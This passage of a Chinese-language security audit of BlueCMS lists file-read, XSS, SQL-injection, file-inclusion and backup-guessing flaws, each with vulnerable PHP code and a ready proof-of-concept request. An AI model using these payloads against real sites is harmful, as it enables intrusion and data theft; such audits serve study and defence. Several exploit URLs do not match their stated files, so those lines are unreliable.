elseif($act == 'do_login'){$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';$pwd = !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';$safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';$useful_time = intval($_POST['useful_time']);$from = !empty($from) ? base64_decode($from) : 'user.php';if($user_name == ''){showmsg('用户名不能为空');}if($pwd == ''){showmsg('密码不能为空');}if($safecode == '' || strtolower($safecode) != strtolower($_SESSION['safecode'])){showmsg('验证码错误');}$row = $db->getone("SELECT COUNT(*) AS num FROM ".table('admin')." WHERE admin_name='$user_name'");if($row['num'] == 1){showmsg('系统用户组不能从前台登录');}$w = login($user_name, $pwd);if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php')){list($uid, $username, $password, $email) = uc_user_login($user_name, $pwd);if($uid>0){$password = md5($password);if(!$w){$db->query("INSERT INTO ".table('user')." (user_name, pwd, email, reg_time) VALUES ('$username', '$password', '$email', '$timestamp')"); $w = 1;}$ucsynlogin = uc_user_synlogin($uid);}elseif($uid === -1){if($w){$user_info = $db->getone("SELECT email FROM ".table('user')." WHERE user_name='$user_name'");$uid = uc_user_register($user_name, $pwd, $user_info['email']);if($uid > 0) $ucsynlogin = uc_user_synlogin($uid);}else $w = -1;}}if($w == -1 || $w==0){showmsg('您输入的用户名和密码不正确');}if($w){update_user_info($user_name);if($useful_time !=0){setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+$useful_time, $cookiepath, $cookiedomain);setcookie('BLUE[user_name]', $user_name, time()+$useful_time, $cookiepath, $cookiedomain);setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+$useful_time, $cookiepath, $cookiedomain);}echo $ucsynlogin;showmsg('欢迎您 '.$user_name.' 回来,现在将转到...', $from);}}
24、user.php 206行处存在任意文件读取漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_reg
elseif($act == 'do_reg'){$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';$pwd = !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';$pwd1 = !empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';$email = !empty($_POST['email']) ? trim($_POST['email']) : '';$safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';$from = !empty($from) ? base64_decode($from) : 'user.php';if(strlen($user_name) < 4 || strlen($user_name) > 16){showmsg('用户名字符长度不符');}if(strlen($pwd) < 6){showmsg('密码不能少于6个字符');}if($pwd != $pwd1){showmsg('两次输入密码不一致');}if(strtolower($safecode) != strtolower($_SESSION['safecode'])){showmsg('验证码错误');}if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){showmsg('该用户名已存在');}if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){showmsg('该用户名已存在');}$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";if(!$db->query($sql)){showmsg('很遗憾,注册中出错啦');}else{$_SESSION['user_id'] = $db->insert_id();$_SESSION['user_name'] = $user_name;update_user_info($_SESSION['user_name']);setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php')){$uid = uc_user_register($user_name, $pwd, $email);if($uid <= 0){if($uid == -1){showmsg('用户名不合法!');}elseif($uid == -2){showmsg('包含不允许注册的词语!');}elseif($uid == -3){showmsg('你指定的用户名 '.$user_name.' 已存在,请使用别的用户名!');}elseif($uid == -4){showmsg('您使用的Email格式不对!');}elseif($uid == -5){showmsg('你使用的Email 不允许注册!');}else{showmsg('注册失败!');}}else{$ucsynlogin = uc_user_synlogin($uid);echo $ucsynlogin;}}$_SESSION['last_reg'] = $timestamp;showmsg('恭喜您注册成功,现在将转向...', $from);}}
25、user.php 130行处存在反射型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=reg&from="/><script>alert(1);</script>"
elseif($act == 'reg')
{if (!empty($_SESSION['user_id']) && $_SESSION['user_id'] != 1){showmsg('您已经登录,请先退出登录再注册!');}if (!isset($_SESSION['last_reg'])){$_SESSION['last_reg'] = 0;}elseif ($timestamp - $_SESSION['last_reg'] < 30) {showmsg('为防止恶意注册,请于30秒后再来注册!');}template_assign(array('current_act', 'from'), array('注册新用户', $from));$smarty->display('reg.htm');
}
26、user.php 58行处存在反射型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=login&from="/><script>alert(1);</script>"
elseif($act == 'login'){if($_SESSION['user_id']){showmsg('您已经登录,不需要重新登录', 'user.php');}template_assign(array('current_act', 'from'), array('登录', $from));$smarty->display('login.htm');}
27、user.php 772行存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg
elseif($act == 'edit_user_info'){$user_id = intval($_SESSION['user_id']);if(empty($user_id)){return false;}$birthday = trim($_POST['birthday']);$sex = intval($_POST['sex']);$email = !empty($_POST['email']) ? trim($_POST['email']) : '';$msn = !empty($_POST['msn']) ? trim($_POST['msn']) : '';$qq = !empty($_POST['qq']) ? trim($_POST['qq']) : '';$mobile_phone = !empty($_POST['mobile_phone']) ? trim($_POST['mobile_phone']) : '';$office_phone = !empty($_POST['office_phone']) ? trim($_POST['office_phone']) : '';$home_phone = !empty($_POST['home_phone']) ? trim($_POST['home_phone']) : '';$address = !empty($_POST['address']) ? htmlspecialchars($_POST['address']) : '';if (!empty($_POST['face_pic1'])){if (strpos($_POST['face_pic1'], 'http://') != false && strpos($_POST['face_pic1'], 'https://') != false){showmsg('只支持本站相对路径地址');}else{$face_pic = trim($_POST['face_pic1']);}}else{if(file_exists(BLUE_ROOT.$_POST['face_pic3'])){@unlink(BLUE_ROOT.$_POST['face_pic3']);}}if(isset($_FILES['face_pic2']['error']) && $_FILES['face_pic2']['error'] == 0){$face_pic = $image->img_upload($_FILES['face_pic2'],'face_pic');}$face_pic = empty($face_pic) ? '' : $face_pic;$sql = "UPDATE ".table('user')." SET birthday = '$birthday', sex = '$sex', face_pic = '$face_pic', email = '$email', msn = '$msn', qq = '$qq'," ." mobile_phone = '$mobile_phone', office_phone = '$office_phone', home_phone = '$home_phone', address='$address' WHERE user_id = ".intval($_SESSION['user_id']);$db->query($sql);showmsg('更新个人资料成功', 'user.php');}
28、user.php 134行存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg
elseif($act == 'do_reg'){$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';$pwd = !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';$pwd1 = !empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';$email = !empty($_POST['email']) ? trim($_POST['email']) : '';$safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';$from = !empty($from) ? base64_decode($from) : 'user.php';if(strlen($user_name) < 4 || strlen($user_name) > 16){showmsg('用户名字符长度不符');}if(strlen($pwd) < 6){showmsg('密码不能少于6个字符');}if($pwd != $pwd1){showmsg('两次输入密码不一致');}if(strtolower($safecode) != strtolower($_SESSION['safecode'])){showmsg('验证码错误');}if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){showmsg('该用户名已存在');}if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){showmsg('该用户名已存在');}$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";if(!$db->query($sql)){showmsg('很遗憾,注册中出错啦');}else{$_SESSION['user_id'] = $db->insert_id();$_SESSION['user_name'] = $user_name;update_user_info($_SESSION['user_name']);setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php')){$uid = uc_user_register($user_name, $pwd, $email);if($uid <= 0){if($uid == -1){showmsg('用户名不合法!');}elseif($uid == -2){showmsg('包含不允许注册的词语!');}elseif($uid == -3){showmsg('你指定的用户名 '.$user_name.' 已存在,请使用别的用户名!');}elseif($uid == -4){showmsg('您使用的Email格式不对!');}elseif($uid == -5){showmsg('你使用的Email 不允许注册!');}else{showmsg('注册失败!');}}else{$ucsynlogin = uc_user_synlogin($uid);echo $ucsynlogin;}}$_SESSION['last_reg'] = $timestamp;showmsg('恭喜您注册成功,现在将转向...', $from);}}
29、guest_book.php 67行处存在sql注入漏洞
Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh Client-Ip:1',user())#
elseif ($act == 'send')
{$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;$rid = intval($_POST['rid']);$content = !empty($_POST['content']) ? htmlspecialchars($_POST['content']) : '';$content = nl2br($content);if(empty($content)){showmsg('评论内容不能为空');}$sql = "INSERT INTO " . table('guest_book') . " (id, rid, user_id, add_time, ip, content) VALUES ('', '$rid', '$user_id', '$timestamp', '$online_ip', '$content')";$db->query($sql);showmsg('恭喜您留言成功', 'guest_book.php?page_id='.$_POST['page_id']);
}
30、guest_book.php 67行处存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh Client-Ip:1','<script>alert(1);</script>')#
elseif ($act == 'send')
{$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;$rid = intval($_POST['rid']);$content = !empty($_POST['content']) ? htmlspecialchars($_POST['content']) : '';$content = nl2br($content);if(empty($content)){showmsg('评论内容不能为空');}$sql = "INSERT INTO " . table('guest_book') . " (id, rid, user_id, add_time, ip, content) VALUES ('', '$rid', '$user_id', '$timestamp', '$online_ip', '$content')";$db->query($sql);showmsg('恭喜您留言成功', 'guest_book.php?page_id='.$_POST['page_id']);
}
31、admin/arc_cat.php 27行处存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_add Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3
elseif($act == 'do_add'){$cat_name = trim($_POST['cat_name']);$parent_id = intval($_POST['parent_id']);$title = !empty($_POST['title']) ? trim($_POST['title']) : '';$keywords = !empty($_POST['keywords']) ? trim($_POST['keywords']) : '';$description = !empty($_POST['description']) ? trim($_POST['description']) : '';$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : '';if($parentid == 0){$cat_indent = 0;}else{$cat_indent = get_catindent($parentid)+1;}$sql = "INSERT INTO ".table('arc_cat')." (cat_id, cat_name, parent_id, title, keywords, description, cat_indent, is_havechild, show_order ) VALUES ('', '$cat_name', '$parent_id', '$title', '$keywords', '$description', '$cat_indent', '0', '$show_order')";if(!$db->query($sql)){showmsg('添加栏目出错', true);}else{$sql = "UPDATE ".table('arc_cat')." SET is_havechild='1' where cat_id=$parent_id";if(!$db->query($sql)){showmsg('更新栏目出错','arc_cat.php', true);$db->query("DELETE FROM ".table('arc_cat')." WHERE cat_id=$cat_id");}showmsg('添加栏目成功','arc_cat.php?pid='.$parent_id, true);}}
32、admin/arc_cat.php 53行处存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=edit Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3
elseif($act == 'edit'){$sql = "SELECT cat_id, cat_name, parent_id, title, keywords, description, show_order FROM ".table('arc_cat')." WHERE cat_id = $cid";$cat = $db->getone($sql);template_assign(array('cat', 'act', 'current_act'), array($cat, $act, '编辑栏目'));$smarty->display('arc_cat_info.htm');}
33、宽字节注入漏洞(若设置数据库编码为GBK)
则可利用%df’) or 1=1#')来实现任意sql查询点的注入漏洞
34、网站重装漏洞
由于程序错误导致lock文件未能写入,导致了该漏洞
( ! ) Fatal error: Cannot redeclare class Smarty in D:\phpstudy_pro\WWW\127.0.0.3\bluecms\include\smarty\Smarty.class.php on line 65
Call Stack
# Time Memory Function Location
1 0.0071 173304 {main}( ) ...\index.php:0
2 2.6150 397072 require_once( 'D:\phpstudy_pro\WWW\127.0.0.3\bluecms\include\common.inc.php' ) ...\index.php:154
3 21.8121 808544 require( 'D:\phpstudy_pro\WWW\127.0.0.3\bluecms\include\smarty\Smarty.class.php' ) ...\common.inc.php:66
35、数据库备份爆破漏洞
由于备份文件的命名仅为日期,如20240707.sql,则可以简单爆破获得数据库备份文件名。且数据库备份路径未进行限制访问,造成了数据库备份的下载漏洞。
$file = date("Ymd", time()).'.sql';
elseif ($act == 'do_backup')
{if (!is_writable(BLUE_ROOT.DATA."backup/")){showmsg('备份文件存放目录data/backup不可写');}$limit_size = !empty($_POST['limit_size']) ? intval($_POST['limit_size']) : '2048';$mysql_type = !empty($_POST['mysql_type']) ? trim($_POST['mysql_type']) : '';$file = date("Ymd", time()).'.sql';$version = BLUE_VERSION;$db_version = $db->dbversion();$add_time = date("Y-m-d H:i:s");$sql .= "--BlueCMS VERSION:".$version."\r\n"."--Mysql VERSION:".$db_version."\r\n"."--Create time:".$add_time."\r\n";$num = 1;if($_POST['tables']){foreach($_POST['tables'] as $val){$sql .= write_head($val);if ($mysql_type == 'mysql40' && $db_version > 4.0){$sql = preg_replace('/ENGINE=MyISAM(.*)/','TYPE=MyISAM', $sql); }elseif($mysql_type == 'mysql41' && $db_version < 4.1){$sql = preg_replace('/TYPE=MyISAM/', 'EMGINE=MyISAM DEFAULT CHARSET='.BLUE_CHARSET, $sql);}$row = $db->getone("SELECT COUNT(*) AS num FROM ".$val);if($row['num'] > 0){$sql .= write_data($val);}if (strlen($sql) >= $limit_size * 1000){$file = date("Ymd", time()).'_'.$num.'.sql';if (!write_file(BLUE_ROOT.DATA.'backup/'.$file, $sql)){showmsg('备份数据库卷-'.$num.'失败');}else{$msg .= '生成备份文件 '.$file.' 成功<br/>';}$num++;$file = date("Ymd", time());$sql = '';}}}
36、user.php 742行处存在任意文件包含漏洞(仅在php5.2下有效)
Exp:http://127.0.0.3/bluecms/user.php?act=pay Post:pay=1.txt......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
elseif ($act == 'pay'){include 'data/pay.cache.php';$price = $_POST['price'];$id = $_POST['id'];$name = $_POST['name'];if (empty($_POST['pay'])) {showmsg('对不起,您没有选择支付方式');}include 'include/payment/'.$_POST['pay']."/index.php";}